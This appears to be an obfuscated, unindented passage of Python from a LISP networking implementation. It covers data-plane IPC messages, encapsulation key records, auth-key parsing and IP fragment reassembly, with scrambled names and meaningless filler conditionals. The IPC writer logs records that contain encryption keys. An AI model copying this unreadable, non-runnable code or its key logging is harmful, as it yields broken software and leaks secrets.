def lisp_write_checkpoint_entry ( checkpoint_list , mc ) :
if ( lisp_checkpoint_map_cache == False ) : return
if 23 - 23: Ii1I % i1IIi - I1Ii111
i1ii1i1Ii11 = "{} rloc " . format ( mc . eid . print_prefix ( ) )
if 95 - 95: OoOoOO00 - ooOoO0o . i1IIi . OoooooooOO
for o0oO0O00 in mc . rloc_set :
if ( o0oO0O00 . rloc . is_null ( ) ) : continue
i1ii1i1Ii11 += "{} {} {}, " . format ( o0oO0O00 . rloc . print_address_no_iid ( ) ,
o0oO0O00 . priority , o0oO0O00 . weight )
if 38 - 38: I1IiiI + I1ii11iIi11i - Oo0Ooo . i11iIiiIii - i1IIi
if 11 - 11: IiII / I1IiiI . I1IiiI
if ( mc . rloc_set != [ ] ) :
i1ii1i1Ii11 = i1ii1i1Ii11 [ 0 : - 2 ]
elif ( mc . action == LISP_NATIVE_FORWARD_ACTION ) :
i1ii1i1Ii11 += "native-forward"
if 87 - 87: OoooooooOO * OoO0O00 * iIii1I11I1II1
if 16 - 16: o0oOOo0O0Ooo * I11i + OoooooooOO + O0 / iIii1I11I1II1
checkpoint_list . append ( i1ii1i1Ii11 )
return
if 60 - 60: Ii1I % IiII * OoooooooOO * ooOoO0o * Ii1I
if 8 - 8: I1Ii111 - o0oOOo0O0Ooo
if 52 - 52: OoOoOO00 % O0 + I1ii11iIi11i . i11iIiiIii
if 59 - 59: Ii1I - I1Ii111 . ooOoO0o - OoOoOO00 + oO0o . OoO0O00
if 88 - 88: OOooOOo - ooOoO0o * o0oOOo0O0Ooo . OoooooooOO
if 3 - 3: I1Ii111
if 24 - 24: Ii1I + i11iIiiIii * I1Ii111 - OoOoOO00 / Ii1I - OoOoOO00
def lisp_check_dp_socket ( ) :
O0oOOOooo = lisp_ipc_dp_socket_name
if ( os . path . exists ( O0oOOOooo ) == False ) :
OOOooO0o = bold ( "does not exist" , False )
lprint ( "Socket '{}' {}" . format ( O0oOOOooo , OOOooO0o ) )
return ( False )
if 54 - 54: ooOoO0o * Ii1I / Ii1I
return ( True )
if 15 - 15: oO0o * I1Ii111
if 11 - 11: Ii1I + o0oOOo0O0Ooo * OoooooooOO % iIii1I11I1II1
if 87 - 87: OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: oO0o + OoOoOO00
if 17 - 17: Ii1I . Oo0Ooo - oO0o % OOooOOo
if 59 - 59: O0
if 75 - 75: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i * oO0o * I11i / OoooooooOO
def lisp_write_to_dp_socket ( entry ) :
try :
i1II111ii1i = json . dumps ( entry )
iI11II111iIII11 = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( iI11II111iIII11 , i1II111ii1i ) )
lisp_ipc_dp_socket . sendto ( i1II111ii1i , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( i1II111ii1i ) )
if 24 - 24: iIii1I11I1II1 % ooOoO0o . Ii1I / OOooOOo
return
if 21 - 21: o0oOOo0O0Ooo . I11i - OOooOOo . II111iiii . I1Ii111 . ooOoO0o
if 34 - 34: o0oOOo0O0Ooo / OOooOOo + Ii1I % Oo0Ooo % I1ii11iIi11i
if 72 - 72: IiII / II111iiii
if 25 - 25: i1IIi + OoOoOO00 + oO0o + OoooooooOO
if 21 - 21: I1ii11iIi11i
if 60 - 60: i1IIi / OoO0O00 . Ii1I
if 16 - 16: i11iIiiIii + OoOoOO00 % Oo0Ooo + I1ii11iIi11i * Ii1I / I1Ii111
if 26 - 26: iII111i
if 31 - 31: iII111i
def lisp_write_ipc_keys ( rloc ) :
oo0o00OO = rloc . rloc . print_address_no_iid ( )
Oo0o = rloc . translated_port
if ( Oo0o != 0 ) : oo0o00OO += ":" + str ( Oo0o )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 45 - 45: OoO0O00
for I1I111iIiI , iIIi1iI1I1IIi , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
o0oO0o00 = lisp_map_cache . lookup_cache ( iIIi1iI1I1IIi , True )
if ( o0oO0o00 == None ) : continue
lisp_write_ipc_map_cache ( True , o0oO0o00 )
if 55 - 55: iIii1I11I1II1 % iIii1I11I1II1 + I11i - ooOoO0o + I1IiiI * O0
return
if 47 - 47: ooOoO0o + iIii1I11I1II1 * OOooOOo . I1IiiI . o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo . OoOoOO00 * OOooOOo
if 86 - 86: IiII * OOooOOo + Ii1I
if 62 - 62: I11i
if 86 - 86: Oo0Ooo % II111iiii + I1Ii111 / I1ii11iIi11i
if 15 - 15: I1IiiI / I1Ii111 % iII111i
if 57 - 57: I1Ii111 . iIii1I11I1II1 / Oo0Ooo / IiII / iII111i * OoOoOO00
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 35 - 35: i1IIi + I1Ii111 - ooOoO0o . I1ii11iIi11i + Oo0Ooo
if 43 - 43: oO0o . OoO0O00 * i1IIi
if 1 - 1: ooOoO0o / i1IIi
if 42 - 42: I1ii11iIi11i * ooOoO0o + OoOoOO00 % I1ii11iIi11i . IiII
OOOOO0o0OOo = "add" if add_or_delete else "delete"
i1ii1i1Ii11 = { "type" : "map-cache" , "opcode" : OOOOO0o0OOo }
if 75 - 75: OoO0O00 * i1IIi - OOooOOo % II111iiii % OoO0O00 - OoOoOO00
I1Ii11iI = ( mc . group . is_null ( ) == False )
if ( I1Ii11iI ) :
i1ii1i1Ii11 [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
i1ii1i1Ii11 [ "rles" ] = [ ]
else :
i1ii1i1Ii11 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
i1ii1i1Ii11 [ "rlocs" ] = [ ]
if 75 - 75: I11i * IiII * ooOoO0o
i1ii1i1Ii11 [ "instance-id" ] = str ( mc . eid . instance_id )
if 31 - 31: Ii1I
if ( I1Ii11iI ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for IiioOoo in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
o0o00O0oOooO0 = IiioOoo . address . print_address_no_iid ( )
Oo0o = str ( 4341 ) if IiioOoo . translated_port == 0 else str ( IiioOoo . translated_port )
if 72 - 72: OOooOOo * Ii1I % OoO0O00
I1I111iIiI = { "rle" : o0o00O0oOooO0 , "port" : Oo0o }
II11iI11i1 , OOOOOo0 = IiioOoo . get_encap_keys ( )
I1I111iIiI = lisp_build_json_keys ( I1I111iIiI , II11iI11i1 , OOOOOo0 , "encrypt-key" )
i1ii1i1Ii11 [ "rles" ] . append ( I1I111iIiI )
if 44 - 44: OoOoOO00 + oO0o / i11iIiiIii
if 23 - 23: i1IIi . i11iIiiIii . Ii1I * I1IiiI * Ii1I . iIii1I11I1II1
else :
for I1II in mc . rloc_set :
if ( I1II . rloc . is_ipv4 ( ) == False and I1II . rloc . is_ipv6 ( ) == False ) :
continue
if 92 - 92: ooOoO0o / i11iIiiIii . IiII + OoooooooOO / I1IiiI . O0
if ( I1II . up_state ( ) == False ) : continue
if 41 - 41: OOooOOo * oO0o . iIii1I11I1II1 . i1IIi
Oo0o = str ( 4341 ) if I1II . translated_port == 0 else str ( I1II . translated_port )
if 6 - 6: OoooooooOO - Oo0Ooo - I1ii11iIi11i
I1I111iIiI = { "rloc" : I1II . rloc . print_address_no_iid ( ) , "priority" :
str ( I1II . priority ) , "weight" : str ( I1II . weight ) , "port" :
Oo0o }
II11iI11i1 , OOOOOo0 = I1II . get_encap_keys ( )
I1I111iIiI = lisp_build_json_keys ( I1I111iIiI , II11iI11i1 , OOOOOo0 , "encrypt-key" )
i1ii1i1Ii11 [ "rlocs" ] . append ( I1I111iIiI )
if 34 - 34: iII111i + i11iIiiIii . IiII
if 54 - 54: Oo0Ooo + I11i - iII111i * ooOoO0o % i11iIiiIii . IiII
if 29 - 29: II111iiii % i11iIiiIii % O0
if ( dont_send == False ) : lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return ( i1ii1i1Ii11 )
if 38 - 38: o0oOOo0O0Ooo * IiII
if 51 - 51: OoooooooOO . Ii1I % OoooooooOO - I1IiiI + I1Ii111 % oO0o
if 28 - 28: i11iIiiIii - I1IiiI * OoO0O00
if 19 - 19: OoooooooOO
if 34 - 34: OoOoOO00 . oO0o
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 33 - 33: iIii1I11I1II1
II11iI11i1 = keys [ 1 ] . encrypt_key
OOOOOo0 = keys [ 1 ] . icv_key
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
O000oo0o = rloc_addr . split ( ":" )
if ( len ( O000oo0o ) == 1 ) :
i1ii1i1Ii11 = { "type" : "decap-keys" , "rloc" : O000oo0o [ 0 ] }
else :
i1ii1i1Ii11 = { "type" : "decap-keys" , "rloc" : O000oo0o [ 0 ] , "port" : O000oo0o [ 1 ] }
if 6 - 6: oO0o * ooOoO0o . I1Ii111 / OOooOOo . OoOoOO00
i1ii1i1Ii11 = lisp_build_json_keys ( i1ii1i1Ii11 , II11iI11i1 , OOOOOo0 , "decrypt-key" )
if 4 - 4: Ii1I / II111iiii + o0oOOo0O0Ooo / IiII
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 9 - 9: ooOoO0o + i1IIi / ooOoO0o / I11i * I1ii11iIi11i / OoooooooOO
if 28 - 28: o0oOOo0O0Ooo
if 97 - 97: I1Ii111 - I1Ii111 * OoO0O00 % II111iiii * IiII
if 2 - 2: I1Ii111 % iII111i . OoooooooOO - o0oOOo0O0Ooo
if 30 - 30: i1IIi / I1Ii111 * oO0o - oO0o / oO0o
if 9 - 9: IiII / o0oOOo0O0Ooo . IiII * O0 % i11iIiiIii % OoOoOO00
if 29 - 29: I1ii11iIi11i % ooOoO0o . OOooOOo . Ii1I . IiII
if 69 - 69: o0oOOo0O0Ooo . i11iIiiIii * I11i + IiII / I11i
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 66 - 66: I1ii11iIi11i % I1Ii111 - i11iIiiIii % I11i
entry [ "keys" ] = [ ]
o0Oo = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( o0Oo )
return ( entry )
if 62 - 62: i11iIiiIii % iIii1I11I1II1 / IiII . I1IiiI * O0
if 17 - 17: I1ii11iIi11i - I1Ii111 % II111iiii + OOooOOo
if 45 - 45: I1Ii111 + iII111i - iIii1I11I1II1 / Oo0Ooo
if 92 - 92: iIii1I11I1II1 . OoO0O00 - I11i % I1ii11iIi11i / i11iIiiIii
if 4 - 4: Oo0Ooo / I1IiiI * i1IIi . II111iiii
if 13 - 13: i1IIi
if 39 - 39: OOooOOo
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 73 - 73: OoO0O00 . ooOoO0o
if 13 - 13: o0oOOo0O0Ooo - OoOoOO00
if 60 - 60: OoO0O00
if 17 - 17: i11iIiiIii % i1IIi % I1IiiI % ooOoO0o + I1Ii111 + Oo0Ooo
i1ii1i1Ii11 = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 16 - 16: iII111i . I1ii11iIi11i . oO0o . OoO0O00
if 90 - 90: i1IIi . ooOoO0o + i11iIiiIii * OoooooooOO
if 30 - 30: iII111i . OoO0O00 . i11iIiiIii / I1ii11iIi11i * Oo0Ooo
if 38 - 38: IiII + II111iiii
for Oooo00oo in lisp_db_list :
if ( Oooo00oo . eid . is_ipv4 ( ) == False and Oooo00oo . eid . is_ipv6 ( ) == False ) : continue
I11II1IIIi1II = { "instance-id" : str ( Oooo00oo . eid . instance_id ) ,
"eid-prefix" : Oooo00oo . eid . print_prefix_no_iid ( ) }
i1ii1i1Ii11 [ "database-mappings" ] . append ( I11II1IIIi1II )
if 86 - 86: I1IiiI / oO0o
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
if 50 - 50: Ii1I + O0 . I1IiiI * Oo0Ooo
if 15 - 15: Oo0Ooo
if 53 - 53: OoooooooOO * O0 / iII111i * ooOoO0o % I1Ii111 + OOooOOo
if 95 - 95: I1Ii111 % OoOoOO00 . IiII * iII111i % Ii1I
if 18 - 18: iIii1I11I1II1 / ooOoO0o / I1Ii111 % oO0o * Ii1I
i1ii1i1Ii11 = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 14 - 14: oO0o
if 72 - 72: iIii1I11I1II1 / II111iiii * II111iiii + I1IiiI + iIii1I11I1II1 + oO0o
if 46 - 46: I1Ii111
if 23 - 23: Oo0Ooo * IiII - I1Ii111 . OoooooooOO
if 78 - 78: OoOoOO00 - iIii1I11I1II1
if 20 - 20: i1IIi
if 72 - 72: ooOoO0o . II111iiii
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
i1ii1i1Ii11 = { "type" : "interfaces" , "interfaces" : [ ] }
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
for II1i in lisp_myinterfaces . values ( ) :
if ( II1i . instance_id == None ) : continue
I11II1IIIi1II = { "interface" : II1i . device ,
"instance-id" : str ( II1i . instance_id ) }
i1ii1i1Ii11 [ "interfaces" ] . append ( I11II1IIIi1II )
if 100 - 100: O0
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
lisp_write_to_dp_socket ( i1ii1i1Ii11 )
return
if 88 - 88: O0 . iIii1I11I1II1 . I1ii11iIi11i
if 80 - 80: oO0o / i1IIi * iIii1I11I1II1
if 38 - 38: Ii1I
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
def lisp_parse_auth_key ( value ) :
OO000oOooO00 = value . split ( "[" )
O0o000oo00o00 = { }
if ( len ( OO000oOooO00 ) == 1 ) :
O0o000oo00o00 [ 0 ] = value
return ( O0o000oo00o00 )
if 22 - 22: II111iiii . OoOoOO00 * Ii1I * Ii1I / i11iIiiIii * O0
if 67 - 67: oO0o / I11i . Oo0Ooo
for O0o0OoO0 in OO000oOooO00 :
if ( O0o0OoO0 == "" ) : continue
ooo = O0o0OoO0 . find ( "]" )
o00oO = O0o0OoO0 [ 0 : ooo ]
try : o00oO = int ( o00oO )
except : return
if 50 - 50: OoOoOO00 + iII111i . Oo0Ooo / OoO0O00 + II111iiii
O0o000oo00o00 [ o00oO ] = O0o0OoO0 [ ooo + 1 : : ]
if 91 - 91: iIii1I11I1II1
return ( O0o000oo00o00 )
if 32 - 32: OoOoOO00 * oO0o / O0 . o0oOOo0O0Ooo
if 47 - 47: i1IIi
if 61 - 61: OOooOOo * I1ii11iIi11i - ooOoO0o - Oo0Ooo + o0oOOo0O0Ooo . ooOoO0o
if 98 - 98: II111iiii
if 56 - 56: i1IIi % IiII / I1Ii111
if 1 - 1: I1IiiI / OoOoOO00 - oO0o + OoooooooOO
if 51 - 51: ooOoO0o + Ii1I * o0oOOo0O0Ooo * I1IiiI / oO0o + OoO0O00
if 92 - 92: oO0o * o0oOOo0O0Ooo % ooOoO0o + OoOoOO00 * OoooooooOO * Oo0Ooo
if 86 - 86: iII111i / OoooooooOO * I1Ii111 % I1IiiI + Ii1I
if 16 - 16: OoO0O00
if 41 - 41: i1IIi
if 72 - 72: OoooooooOO / i11iIiiIii - O0 . OoOoOO00
if 41 - 41: IiII + oO0o * iIii1I11I1II1 % oO0o + IiII
if 64 - 64: I1ii11iIi11i % OoO0O00 + oO0o
if 47 - 47: I1ii11iIi11i + Ii1I % I1Ii111 % OoO0O00 . IiII % i1IIi
if 14 - 14: O0 / I1IiiI . I1ii11iIi11i
def lisp_reassemble ( packet ) :
Ooi1IIii1i = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 47 - 47: I1Ii111 * ooOoO0o / iII111i . O0
if 61 - 61: II111iiii . OoO0O00 * OoO0O00 % II111iiii % OOooOOo * OoOoOO00
if 82 - 82: Ii1I
if 83 - 83: I1IiiI
if ( Ooi1IIii1i == 0 or Ooi1IIii1i == 0x4000 ) : return ( packet )
if 22 - 22: IiII / Ii1I + I1Ii111 % iIii1I11I1II1
if 75 - 75: OoOoOO00 % OoOoOO00 % o0oOOo0O0Ooo % I1ii11iIi11i + IiII
if 45 - 45: I11i - iIii1I11I1II1
if 20 - 20: OoOoOO00
iIiIi1i1Iiii = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
O0iiII1iiiI1II1 = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 84 - 84: OoOoOO00
o0O0 = ( Ooi1IIii1i & 0x2000 == 0 and ( Ooi1IIii1i & 0x1fff ) != 0 )
i1ii1i1Ii11 = [ ( Ooi1IIii1i & 0x1fff ) * 8 , O0iiII1iiiI1II1 - 20 , packet , o0O0 ]
if 1 - 1: I1IiiI - O0
if 59 - 59: OOooOOo % IiII . ooOoO0o + O0 . ooOoO0o + iIii1I11I1II1
if 68 - 68: i11iIiiIii . iII111i + OoooooooOO + II111iiii + iIii1I11I1II1 % I11i
if 7 - 7: i1IIi - o0oOOo0O0Ooo - I1IiiI
if 62 - 62: OoOoOO00 * oO0o - I1IiiI / Ii1I
if 48 - 48: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoOoOO00
if 13 - 13: OoO0O00 - Ii1I . ooOoO0o / O0 * OoOoOO00
if 57 - 57: O0 + OoooooooOO % o0oOOo0O0Ooo / I1Ii111 / OOooOOo - OoOoOO00
if ( Ooi1IIii1i == 0x2000 ) :
oo0O , O0o0o0ooO0ooo = struct . unpack ( "HH" , packet [ 20 : 24 ] )
oo0O = socket . ntohs ( oo0O )
O0o0o0ooO0ooo = socket . ntohs ( O0o0o0ooO0ooo )
if ( O0o0o0ooO0ooo not in [ 4341 , 8472 , 4789 ] and oo0O != 4341 ) :
lisp_reassembly_queue [ iIiIi1i1Iiii ] = [ ]
i1ii1i1Ii11 [ 2 ] = None
if 48 - 48: o0oOOo0O0Ooo - II111iiii + OoOoOO00
if 54 - 54: II111iiii - OoO0O00 - o0oOOo0O0Ooo - O0 % I1Ii111
if 9 - 9: i1IIi % iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if ( lisp_reassembly_queue . has_key ( iIiIi1i1Iiii ) == False ) :
lisp_reassembly_queue [ iIiIi1i1Iiii ] = [ ]
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
O00oOoO0o = lisp_reassembly_queue [ iIiIi1i1Iiii ]
if 75 - 75: I11i . iII111i + OoOoOO00 / oO0o . OOooOOo * I1Ii111
if 45 - 45: OoO0O00 + O0
if 20 - 20: I1IiiI . O0 / i1IIi + i11iIiiIii * IiII % OoOoOO00
if 78 - 78: OoOoOO00 . OoooooooOO + iII111i / OoOoOO00 - I1Ii111
if 52 - 52: iII111i - II111iiii % i1IIi / iII111i
if ( len ( O00oOoO0o ) == 1 and O00oOoO0o [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( iIiIi1i1Iiii ) . zfill ( 4 ) ) )
if 14 - 14: oO0o / I1Ii111 / IiII - i1IIi * Ii1I
return ( None )
if 90 - 90: ooOoO0o
if 100 - 100: iII111i * i1IIi . iII111i / O0 / OoO0O00 - oO0o
if 65 - 65: OoOoOO00 + ooOoO0o * OoO0O00 % OoooooooOO + OoooooooOO * OoooooooOO
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
O00oOoO0o . append ( i1ii1i1Ii11 )
O00oOoO0o = sorted ( O00oOoO0o )
if 88 - 88: OoooooooOO / I11i % II111iiii % OOooOOo - I11i
if 55 - 55: Oo0Ooo - OOooOOo - O0
if 40 - 40: OoOoOO00 - OOooOOo
if 3 - 3: IiII % I11i * I1Ii111 + iIii1I11I1II1 . oO0o
o0o00O0oOooO0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
o0o00O0oOooO0 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
ii111i1i11II1iii = o0o00O0oOooO0 . print_address_no_iid ( )
o0o00O0oOooO0 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
iiiI = o0o00O0oOooO0 . print_address_no_iid ( )
o0o00O0oOooO0 = red ( "{} -> {}" . format ( ii111i1i11II1iii , iiiI ) , False )
if 84 - 84: i11iIiiIii * o0oOOo0O0Ooo
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if i1ii1i1Ii11 [ 2 ] == None else "" , o0o00O0oOooO0 , lisp_hex_string ( iIiIi1i1Iiii ) . zfill ( 4 ) ,
# iIii1I11I1II1 / Ii1I
# ooOoO0o + I11i % Oo0Ooo . II111iiii - oO0o
lisp_hex_string ( Ooi1IIii1i ) . zfill ( 4 ) ) )
if 42 - 42: Oo0Ooo * I1IiiI % OoOoOO00
if 9 - 9: OoooooooOO - Oo0Ooo - I1ii11iIi11i * o0oOOo0O0Ooo * I11i
if 27 - 27: OoOoOO00 % OoO0O00 * oO0o . II111iiii - i11iIiiIii
if 56 - 56: OOooOOo . IiII - OOooOOo / i11iIiiIii * I1ii11iIi11i
if 66 - 66: oO0o + ooOoO0o
if ( O00oOoO0o [ 0 ] [ 0 ] != 0 or O00oOoO0o [ - 1 ] [ 3 ] == False ) : return ( None )
iIIiIiiIII1i1 = O00oOoO0o [ 0 ]
for o0o00OoOo0 in O00oOoO0o [ 1 : : ] :
Ooi1IIii1i = o0o00OoOo0 [ 0 ]
OoOOo0 , I1III11ii1I11 = iIIiIiiIII1i1 [ 0 ] , iIIiIiiIII1i1 [ 1 ]
if ( OoOOo0 + I1III11ii1I11 != Ooi1IIii1i ) : return ( None )
iIIiIiiIII1i1 = o0o00OoOo0
if 40 - 40: i11iIiiIii
lisp_reassembly_queue . pop ( iIiIi1i1Iiii )
if 29 - 29: Oo0Ooo - I1IiiI . Ii1I
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
if 6 - 6: I1Ii111 + OoO0O00 + O0 * OoOoOO00 . iIii1I11I1II1 . I1Ii111
if 93 - 93: ooOoO0o % iIii1I11I1II1 + I1ii11iIi11i
packet = O00oOoO0o [ 0 ] [ 2 ]
for o0o00OoOo0 in O00oOoO0o [ 1 : : ] : packet += o0o00OoOo0 [ 2 ] [ 20 : : ]
if 74 - 74: OoOoOO00 + I1ii11iIi11i
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( iIiIi1i1Iiii ) . zfill ( 4 ) , len ( packet ) ) )
if 82 - 82: II111iiii
if 55 - 55: I11i . iIii1I11I1II1 / Ii1I - OoO0O00 * I1ii11iIi11i % iIii1I11I1II1
if 48 - 48: ooOoO0o + Oo0Ooo / Oo0Ooo
if 15 - 15: iIii1I11I1II1 . I1Ii111 * OoooooooOO * O0 % OOooOOo
if 53 - 53: Ii1I
oOOoO0O = socket . htons ( len ( packet ) )
O00O0OO = packet [ 0 : 2 ] + struct . pack ( "H" , oOOoO0O ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 63 - 63: I11i % OoOoOO00
if 46 - 46: iIii1I11I1II1 . II111iiii / OoooooooOO - ooOoO0o * iII111i
O00O0OO = lisp_ip_checksum ( O00O0OO )
return ( O00O0OO + packet [ 20 : : ] )
if 52 - 52: I11i + iII111i
if 9 - 9: OoOoOO00 % II111iiii . I11i * Oo0Ooo
if 53 - 53: II111iiii / i1IIi + OoooooooOO * O0
if 62 - 62: IiII . O0
if 87 - 87: I1ii11iIi11i / oO0o / IiII . OOooOOo
if 91 - 91: OOooOOo % oO0o . OoOoOO00 . I1IiiI - OoOoOO00
if 18 - 18: O0 - I1IiiI + i1IIi % i11iIiiIii
if 97 - 97: iII111i * OoooooooOO + I1Ii111 + ooOoO0o - ooOoO0o
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
oo0o00OO = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 63 - 63: o0oOOo0O0Ooo * OOooOOo + iIii1I11I1II1 + Oo0Ooo
oo0o00OO = addr . print_address_no_iid ( )
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) : return ( oo0o00OO )
if 25 - 25: oO0o + IiII % o0oOOo0O0Ooo
if 24 - 24: OoOoOO00
if 87 - 87: I1ii11iIi11i / ooOoO0o * i1IIi
if 71 - 71: OoOoOO00 - I11i
if 83 - 83: oO0o + oO0o - Oo0Ooo . Oo0Ooo - iII111i . OOooOOo
for oOO0oOooOo0o in lisp_crypto_keys_by_rloc_decap :
oO0OO = oOO0oOooOo0o . split ( ":" )
if ( len ( oO0OO ) == 1 ) : continue
oO0OO = oO0OO [ 0 ] if len ( oO0OO ) == 2 else ":" . join ( oO0OO [ 0 : - 1 ] )
if ( oO0OO == oo0o00OO ) :
iIi11III = lisp_crypto_keys_by_rloc_decap [ oOO0oOooOo0o ]
lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] = iIi11III
return ( oo0o00OO )
if 97 - 97: I1IiiI - I1Ii111 % IiII / OOooOOo + I1IiiI . I11i
if 89 - 89: I1IiiI . OoOoOO00 / OoOoOO00 - OoO0O00 / OoooooooOO
return ( None )
if 62 - 62: II111iiii
if 41 - 41: OOooOOo * ooOoO0o
if 47 - 47: OOooOOo + I1Ii111 . OoooooooOO * oO0o / I11i + Ii1I
if 75 - 75: IiII
if 66 - 66: o0oOOo0O0Ooo + oO0o
if 36 - 36: Oo0Ooo / IiII % Ii1I / o0oOOo0O0Ooo * I1Ii111
if 83 - 83: iIii1I11I1II1 - Oo0Ooo - iIii1I11I1II1 * I1ii11iIi11i - II111iiii + IiII
if 84 - 84: I11i
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
if 21 - 21: Ii1I
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
O0IiIIiI1111iI = addr + ":" + str ( port )
if 78 - 78: iIii1I11I1II1 - OoOoOO00 * I1IiiI + I1ii11iIi11i
if ( lisp_i_am_rtr ) :
if ( lisp_rloc_probe_list . has_key ( addr ) ) : return ( addr )
if 34 - 34: Ii1I / Oo0Ooo - II111iiii + iIii1I11I1II1 . I1ii11iIi11i % II111iiii
if 37 - 37: OoO0O00 * i1IIi
